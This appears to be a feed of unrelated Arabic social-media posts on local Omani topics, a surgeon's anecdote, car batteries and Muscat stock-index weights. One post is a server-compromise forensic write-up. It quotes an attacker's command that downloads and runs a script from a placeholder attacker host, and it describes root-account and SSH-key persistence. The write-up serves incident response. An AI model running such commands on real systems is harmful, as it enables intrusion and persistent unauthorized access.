@ahmed_shamas10@Rassd_24 طيب المستثمر اقام هذا المشروع وجزاه الله خير وهو احد الخيارات التي اصبحت متوفرة لمن اراد ان يعيش التجربة .. الاسعار بكل تأكيد وضعت بعد دراسة للسوق ولتكلفة المشروع . من اراد ان يصعد للعين وعنده القدرة فأهلا وسهلا ومن كان غير قادر فالمشروع ليس لمثله وهناك مشاريع اخرى بدون اي انتقاد
لله الأمر من قبل ومن بعد وحكم الله ماض في خلقه رحمك الله يا خصيب رحمة واسعة ورزقك مغفرة عظيمة واسكنك الفردوس الاعلى من الجنة والهم اهلك ومحبيك الصبر والسلوان.
المهندس خصيب فقيدة رجل صالح ومصلح ومحب للخير
@Aljaberzoon هل كل هذه المقالات هي حسد لألا تستفيد عمان من موقعها الجعرافي .. لماذا لا ندعم عمان في جني شي من الفائدة من الخدمات التي يمكنها تقديمها للعبور بدل حثها على التنازل عن كل مصالحها. اذا كنتم تتكلموا عن مصلحة عمان فهيأوا لها الجو لتستفيد بشكل لا يضر دول مجلس التعاون
خلال التحقيق في أحد الخوادم، لاحظنا وجود سلوك غير طبيعي في النظام، وبعد الفحص الجنائي الرقمي اكتشفنا أن المهاجم لم يكتفِ بالدخول إلى الخادم، بل قام بإنشاء حساب بصلاحيات Root (UID 0)، وأضاف مفاتيح SSH خاصة به لضمان العودة إلى الخادم في أي وقت.
ومن بين الملفات التي عثرنا عليها سكربت صغير لا يتجاوز سطر واحد، كانت مهمته إضافة حساب جديد بصلاحيات كاملة إلى ملفات النظام:
/etc/passwd
/etc/shadow
وبسبب تشغيل هذا السكربت أكثر من مرة، ظهرت حسابات Root مكررة داخل النظام.
أثناء التحقيق استخدمنا أوامر بسيطة لكنها كشفت الحقيقة، منها:
id root
getent passwd 0
awk -F: '$3==0' /etc/passwd
وكانت النتيجة وجود أكثر من حساب يمتلك UID 0، وهو أمر غير طبيعي في أي نظام Linux.
كما تم العثور على سكربت خبيث داخل:
/etc/.cp.sh
وبعد مراجعة سجل الأوامر (.bash_history) تبين أن المهاجم قام بتحميله وتشغيله يدويا :
wget http://<attacker-ip>/cp.sh -O /etc/.cp.sh
chmod 777 /etc/.cp.sh
/etc/.cp.sh
ولم يتوقف الأمر عند ذلك، بل أضاف ايضا مفاتيح SSH داخل:
/root/.ssh/authorized_keys
وبذلك أصبح بإمكانه العودة إلى الخادم حتى بعد تغيير كلمة مرور Root.
ومن أوامر التحقيق التي ساعدت في كشف الاختراق:
last -ai
stat /etc/passwd
stat /etc/shadow
pwck
grpck
find / -name ".cp.sh"
grep -R "cpanel-srv" /etc
لا تفترض أن الخادم آمن لأنه يعمل بشكل طبيعي.
راقب دايما أي حساب يمتلك UID 0.
افحص ملف authorized_keys بشكل دوري.
راجع مهام Cron والخدمات والملفات التي أُنشئت أو عدلت مؤخرا.
احتفظ بالأدلة الرقمية قبل حذف أي ملف أثناء الاستجابة للحادث.
إذا تأكدت من وصول المهاجم إلى صلاحيات Root، فإعادة بناء الخادم من مصدر موثوق غالبا تكون الخيار الأكثر امان.
من أسبوعين كنت اتكلمت عن موقف غريب حصلي في العيادة في مصر…
دخلت أكشف على مريض لقيته من سلطنة عُمان جاي أعمله جراحة تصليح اعوجاج بالعمود الفقري، وبعده مباشرة دخلت الغرفة اللي جنبها لقيت مريض تاني… برضه من سلطنة عُمان، وبرضه جاي أعمله نفس الجراحة.
سألتهم إذا كانوا يعرفوا بعض، قالولي: لا … إحنا اتقابلنا هنا بالصدفة.
النهارده في دبي، في مستشفى آدم ڤيتال، كان عندي مريضين من سلطنة عُمان، والاتنين عملتلهم النهاردة جراحة تصليح اعوجاج بالعمود الفقري ورا بعض علطول… ودول غير بتوع مصر😃
من أسبوعين قلت إن اللي حصل في مصر صدفة نادرة جداً: مريضين من عُمان، في عيادة في مصر، عند نفس الجراح، وفي نفس التوقيت بالدقيقه لعمل نفس العمليه.
لكن لما نحط موقف عمليات النهارده على اللي حصل من أسبوعين… يبقى يمكن فيه تفسير تاني غير الصدفة🧐.
عموماً أهل عُمان لهم مكانة خاصة في قلبي، ومن أطيب الشعوب اللي اتعاملت معاها.
شكراً اهل عُمان على الثقة الغالية و الحمد لله علي سلامة الجميع
🚨 السر اللي ما يبيك راعي المحلات تعرفه عن بطاريات السيارات!
كثير منا يشتري بطارية جديدة، ويتفاجأ إنها تموت بعد سنة وكم يوم بالضبط، وكأن فيها مؤقت خربان! 🧐
الموضوع مو حظ، السر كله يكمن في رموز مخفية وتفاصيل بسيطة لو عرفتها بتشتري بطارية تعيش معك من 3 إلى 5 سنوات وتوفر فلوسك. 👇🧵
أنواع البطاريات (الرموز اللي تحدد عمرها)
سيبدأ من الغد العمل بعينة المؤشر الجديدة لـ #بورصة_مسقط
اوكيو للاستكشاف والانتاج هي ( شيخة المؤشر ) بنسبة تأثير بمقدار ٤٠٪
يليها ( الرشيد ) بنك مسقط بنسبة ٣٤.٥٪
بعدها بنك صحار بنسبة ١٤ ٪
ثم اسياد بنسبة ١٢ ٪
ذكرت هذا الموضوع لانه مهم لمعرفة اسباب صعود و نزول مؤشر السوق من خلال تاثير هذي الشركات